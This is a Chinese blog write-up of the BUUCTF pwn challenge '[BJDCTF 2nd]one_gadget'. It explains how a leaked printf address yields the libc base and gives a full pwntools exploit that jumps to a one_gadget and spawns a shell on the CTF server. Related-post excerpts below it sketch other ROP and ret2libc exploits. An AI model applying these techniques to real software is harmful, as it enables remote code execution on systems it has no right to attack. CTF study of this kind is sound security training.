[BUUCTF]PWN15——[BJDCTF 2nd]one_gadget

最新推荐文章于 2022-04-23 22:17:48 发布
最新推荐文章于 2022-04-23 22:17:48 发布
阅读量416 收藏 2
点赞数 2
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/108302650
版权

[BUUCTF]PWN15——[BJDCTF 2nd]one_gadget

附件

步骤:
例行检查,64位,保护全开
在这里插入图片描述
nc试运行一下程序,看看情况,它一开始给了我们一个地址,然后让我们输入one gadget的地址
在这里插入图片描述
64位ida载入,shift+f12查看字符串,根据nc看到的字符串,找到关键函数
在这里插入图片描述
在这里插入图片描述
题目一开始输出的是printf函数的地址,题目一开始给了libc,知道了它的内存地址,就能够算出程序的偏移量了

print_addr=0x7fbe7e114830
offset=print_addr-libc.symbols['printf']
print offset

在这里插入图片描述
接下来我们找一下one gadget的地址

 one_gadget  libc-2.29.so

在这里插入图片描述
这边有4个one_gadget可以让我们利用,但是要满足寄存器的条件才能获取shell,会看汇编的可以去看一下哪个满足条件,不会的一个一个试一下(我就属于一个一个试的)

完整 EXP

from pwn import*

r=remote('node3.buuoj.cn',26120)
elf=ELF('onegadget')
libc=ELF('./libc-2.29.so')

r.recvuntil('0x')
print_addr=int(r.recvn(12),16)

offset=print_addr-libc.symbols['printf']

print offset

one_gadget=[0xe237f,0xe2383,0xe2386,0x106ef8]
shell=offset+one_gadget[3]
r.recvuntil('Give me your one gadget:')
r.sendline(str(shell))

r.interactive()
Angel~Yan
关注
专栏目录
one_gadget用法|攻防世界pwn进阶区babystack
Kni9hT's Blog
03-25 8346
文章目录0x00.检查保护 0x00.检查保护 devil@ubuntu:~/adworld/pwn$ checksec babystack [*] '/home/devil/adworld/pwn/babystack' Arch: amd64-64-little RELRO: Full RELRO ;无法修改got表 Stack: Canary fou...
buuoj BJDCTF 2nd one_gadget
pondzhang的专栏
03-25 624
程序输出printf函数地址 可以利用工具one_gadget计算libc基址 from pwn import * #p = process('./one_gadget') p = remote("node3.buuoj.cn",26742) out = p.recv() addr = int(out[out.find('0x')+2:out.find('0x')+14],16) ...
buuctf [BJDCTF 2nd]one_gadget
carol2358的博客
04-18 589
libc可以在buuctf上下载。本题会泄漏printf的地址 14位,所以不用u64,u64用在6个字节的字符串上,改用int int - int one用one_gadget libc找,通过调试运行到call rdx,然后x/gx rdx的地址之类的,来确定里面的值 也可以不用info直接看到 发现最后一个是可行的 exp: from pwn import * from L...
BUUCTF one_gadget
Sakura给爷pwn全场
02-21 407
https://www.yuque.com/chenguangzhongdeyimoxiao/xx6p74/ng8arh
CTF-Pwn-[BJDCTF 2nd]one_gadget
归子莫的博客
05-06 1675
CTF-Pwn-[BJDCTF 2nd]one_gadget 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]one_gadget 下载题目的文件 one_gadget...
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2609
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4091
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 351
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 490
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 645
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
one_gadget:在libc.so.6中找到一个小工具RCE的最佳工具
02-05
小工具 在进行ctf pwn挑战时,我们通常需要一个小工具RCE(远程代码执行),这会导致调用execve('/bin/sh', NULL, NULL) 。 这个宝石提供了这种小工具查找器,无需像傻瓜一样每次都使用objdump或IDA-pro :winking_face: 要使用此工具,请在命令行中键入one_gadget /path/to/libc并享受其中的魔力 :grinning_squinting_face: 安装 在RubyGems.org上可用! $ gem install one_gadget 注意:需要ruby版本> = 2.1.0,可以使用ruby --version进行检查。 支持的架构 i386 amd64(x86-64) a
[BJDCTF 2nd]one_gadget
、moddemod
06-12 234
这里主要是用到了这个工具,但是这个工具的原理我还不了解,但是我调试了一下,最主要的是这个工具提供的shell需要满足它下面给的约束条件,对于这个题目而言要利用这个shell的条件就是[rsp + 0x70] == NULL exp from pwn import * context(log_level = 'debug') libc = ELF('./libc/libc-2.29.64.so') p = remote('node3.buuoj.cn', 25656) p.recvuntil('0...
BJDCTF_ one_gadget
weixin_44864859的博客
04-09 336
考察点:one_gadget 题目给出了 printf 的地址,由此可算得 libc 基址,然后找 one_gadget、计算 libc 中 one_gadget 地址 printf("Give me your one gadget:"); __isoc99_scanf("%ld", &v4); v5 = v4; v4(); v4 是个函数指针,scanf 的时候把 on...
one_gadget
Trick的博客
11-27 564
[BJDCTF 2nd]one_gadget ida看main函数 再看init函数 会输出一个printf的地址 使用one_gadget,计算一下libc的基址 buuctf给了远程的libc文件,下载下来 one_gadget [libcfilename] exp: from pwn import * context.log_level='debug' p=remote('node3.buuoj.cn',25812) libc=ELF('./libc-2.29.so') p.recvunt
[BUUCTF]PWN——oneshot_tjctf_2016(one_gadget)
mcmuyanga的博客
02-01 835
oneshot_tjctf_2016 附件 步骤 例行检查,64位程序,开启了nx 本地试运行一下看看大概的情况 64位ida载入
1.实验吧_ropbaby(西普杯CTF)_onegadget
Jc
05-26 433
分析 1.先查看文件位数,安全机制 2.查看strings,调用函数(特别注意常见的函数) 漏洞点 EXP from pwn import * context.log_level = "debug" p = process('./ropbaby') p.recvuntil(': ') p.sendline('2') p.recvuntil('Enter symbol: ') p.send...
CTF】32位/64位dlresolve最全总结(无地址泄露执行one_gadget)
panhewu9919的博客
09-05 2033
利用dl_resolve执行libc内任意gadget(不需泄露libc地址) 实验代码下载地址:https://github.com/bsauce/CTF/tree/master/dl_resolve_64 分析:0CTF的题目blackhole2,很简单的栈溢出,但是远程不允许回显,所以不能泄露libc_base,不能返回shell。程序本身所含有的gadget有限,所以能不能不泄露libc_...
one_gadget的安装与使用
weixin_62675330的博客
03-04 4217
0x0 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 没有ROP_gadget的赶快了。 ROP_gadget 下载安装与使用 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 one_gadget 是libc中存在的一些执行execve(“bin/sh",NULL,NULL)的片段。当我们知道libc的版本,并且通过信息泄露得到libc的基址,就可以通过控制EIP/RIP( 覆盖.go
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值